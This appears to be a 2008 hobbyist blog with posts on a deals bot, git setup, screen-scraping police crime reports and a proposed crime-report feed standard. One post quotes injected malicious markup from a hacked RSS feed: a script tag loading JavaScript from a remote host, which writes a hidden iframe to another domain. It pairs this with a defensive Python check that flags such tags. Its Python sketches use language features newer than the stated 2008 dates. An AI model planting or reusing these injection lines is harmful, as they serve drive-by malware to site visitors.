Thursday, August 21, 2008

dealer.py saves

The deals bot saves the day again:

<PsWii60> hey kvn-1
<PsWii60> I just wanted to tell you , great channel (#deals) :D
<PsWii60> I made a nice purchase the other day and talked to kbob, he told me to talk to you and thank you
<PsWii60> so thank YOU! :)
<kvn-1> No problem dude
<kvn-1> I've purchased a few things through it as well
<PsWii60> oh ya
<PsWii60> I bought a samsung 52" lcd
<kvn-1> nice
<PsWii60> 500$ below retail price (free shipping + no tax)
<PsWii60> thanks to you :)

Saturday, August 9, 2008

git from the beginning

I have some code that was not under version control and figured it was time to get it covered by something, so I went with git. The setup is butt simple. Observe:

$ mkdir crime-reporter
$ cd crime-reporter
$ git init
$ cp ../crimeparser/* .
$ git add .
$ git commit

And now I'm ready to branch off. You can even skip the mkdir step and run git init in the current working directory if you want, but I wanted to create a new directory structure anyway. Incidentally, this is a new git repository to house my crime parser and, eventually, the Hyattsville Crime Map code.

Thursday, August 7, 2008

Techbargains gets cracked

My dealviewer started serving up some bogus data from Techbargains today. I'm going to have to say that when your RSS feed starts containing text like:

<script src="http://jjmaoduo.3322.org/csrss/w.js"></script>

which pulls down code that does this:

document.write("<iframe width=100 height=0 src=http://mh.976801.cn/flash.htm></iframe>");

...you can safely conclude that your data and code are in the hands of someone you probably don't know.

Judging by the message about the site undergoing "maintenance," I'd say they already know about it.
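A feed consumer can defend itself against this kind of thing with a simple check before displaying anything. What follows is a minimal sketch, not the dealviewer's actual code: the function name suspicious_items is made up for illustration, and it assumes the feed is ordinary RSS with item elements. It flags any item whose text contains a script or iframe tag, whether the markup arrives escaped inside the description or as real XML elements.

```python
import re
import xml.etree.ElementTree as ET

# Tags that have no business appearing inside a deal description.
SUSPICIOUS = re.compile(r"<\s*(script|iframe)\b", re.IGNORECASE)


def is_suspicious(item):
    """True if an RSS item carries script or iframe markup."""
    # Escaped markup (&lt;script ...) is decoded by the parser and shows up as text.
    text = " ".join(item.itertext())
    if SUSPICIOUS.search(text):
        return True
    # Unescaped markup shows up as actual child elements instead.
    return any(el.tag.lower() in ("script", "iframe") for el in item.iter())


def suspicious_items(feed_xml):
    """Return the titles of all flagged items in an RSS document (hypothetical helper)."""
    root = ET.fromstring(feed_xml)
    return [
        item.findtext("title", default="(untitled)")
        for item in root.iter("item")
        if is_suspicious(item)
    ]
```

A check like this only catches the obvious cases; anything that renders feed content in a browser should still escape or sanitize it.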

Saturday, August 2, 2008

In need of a standard

Above some arbitrary threshold, each police department reports public statistics about crimes reported within its jurisdiction. The Hyattsville City Police are no exception and mail out a synopsis of each crime in a weekly e-mail. This e-mail is usually about a week behind the actual events and comes out in text and PDF formats. From what I can see, police departments have varying levels of sophistication when it comes to publishing their crime blotter, but a common theme is that none of them seem to publish it in a programmatically interesting way.

When I moved to Hyattsville in 2003, I was a little concerned about the crime in PG County. I started poking around the electronic services available for the city and soon found out how to get the crime blotter e-mailed to me. Having seen the Chicago Police Department's Google mashup, I figured it was time for Hyattsville to get the same thing, so I built one. It works great (notwithstanding persistent TIGER geocoding problems) and, judging by my logs, I serve quite a few people who are visualizing their local crime situation. But, I'm sad to report, it's currently broken and I'm behind on at least 3 or 4 crime reports.

I'm screen scraping. Screen scraping is the lowest of the low, the option of last resort, when you are trying to acquire data from some source. Screen scraping is essentially the practice of writing a program that pretends to be human and "reads" the screen, just as a human would while sitting in front of a browser window. It's rife with problems and prone to failure. It's brittle. Somewhere in the chain between Hyattsville PD and my e-mail inbox, someone adjusted some white space or something about the format of the reports earlier this month and that broke the whole process.

Why do I screen scrape? It's a matter of structure. The crime reports have structure and humans are very good at parsing arbitrary structures. But ill-defined structures are very difficult to properly capture in a program. There are tricks to defend against failures due to subtle changes, but the real solution is to define an interface between the two endpoints.
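Two of those defensive tricks are easy to show: match on runs of white space rather than exact column positions, and fail loudly when a line doesn't fit instead of silently producing garbage. The sketch below assumes a made-up line layout (date, 24-hour time, offense in capitals, then an address starting with a number). The real Hyattsville report format is not shown here, so treat the pattern and the parse_line name as hypothetical.

```python
import re

# Hypothetical layout: date, time (optional "hrs"), OFFENSE IN CAPS, street address.
# Every separator is \s+ so that extra spaces or tabs do not break the match.
LINE = re.compile(
    r"^\s*(?P<date>\d{1,2}/\d{1,2}/\d{2,4})\s+"
    r"(?P<time>\d{3,4})\s*(?:hrs\.?)?\s+"
    r"(?P<offense>[A-Z][A-Z ]*[A-Z])\s+"
    r"(?P<address>\d.*?)\s*$"
)


def parse_line(line):
    """Parse one report line into a dict, or raise ValueError if it does not fit."""
    match = LINE.match(line)
    if match is None:
        # Refusing to guess makes a format change visible right away.
        raise ValueError(f"unrecognized report line: {line!r}")
    record = match.groupdict()
    # Collapse stray white space inside the offense name.
    record["offense"] = " ".join(record["offense"].split())
    return record
```

This buys some tolerance for white space changes, but it's still guessing at structure. A reordered or renamed field breaks it just the same.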

Someone has done this. CrimeReports.com currently provides an interface for law enforcement to publish their crime reports, and they'll essentially handle the rest. It's an attractive idea for small-time departments who don't have the budget to run a web site but have citizens who find these services essential. The trick behind CrimeReports is that they charge the police a fee for this service. They want $50-$200 per month from each individual department.

But this is old school. The Web calls for something more social, more distributed. What we need is to define a standard interface for the crime report and make it easy for police departments to publish a well-defined document with the crime information. It's silly for them to pay a web site for this information -- the information is what's valuable! Without crime reports there is no CrimeReports.com. Once reports are published in the same format, probably on some sort of RSS-style feed, the inventive programmers of the Web will take care of the rest, all at no recurring cost to the local police.
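To make the idea concrete, here is a rough sketch of what publishing and consuming such a feed could look like. No such standard exists in this post, so every field and element name below (case_id, occurred, address and so on) is an assumption made up for illustration, and the output is only RSS-like, not a validated RSS document.

```python
import xml.etree.ElementTree as ET
from dataclasses import dataclass


@dataclass
class CrimeReport:
    # Hypothetical fields; a real standard would have to agree on these.
    case_id: str
    occurred: str  # timestamp as text, e.g. ISO 8601
    offense: str
    address: str


def to_feed(reports, title):
    """Publisher side: serialize reports as a minimal RSS-style channel."""
    rss = ET.Element("rss", version="2.0")
    channel = ET.SubElement(rss, "channel")
    ET.SubElement(channel, "title").text = title
    for report in reports:
        item = ET.SubElement(channel, "item")
        ET.SubElement(item, "guid").text = report.case_id
        ET.SubElement(item, "title").text = report.offense
        ET.SubElement(item, "occurred").text = report.occurred
        ET.SubElement(item, "address").text = report.address
    return ET.tostring(rss, encoding="unicode")


def from_feed(feed_xml):
    """Consumer side: read the same fields back, no screen scraping needed."""
    root = ET.fromstring(feed_xml)
    return [
        CrimeReport(
            case_id=item.findtext("guid"),
            occurred=item.findtext("occurred"),
            offense=item.findtext("title"),
            address=item.findtext("address"),
        )
        for item in root.iter("item")
    ]
```

The point is the round trip: whatever the department writes with to_feed, any program can read back with from_feed, field for field, without caring how the white space is laid out.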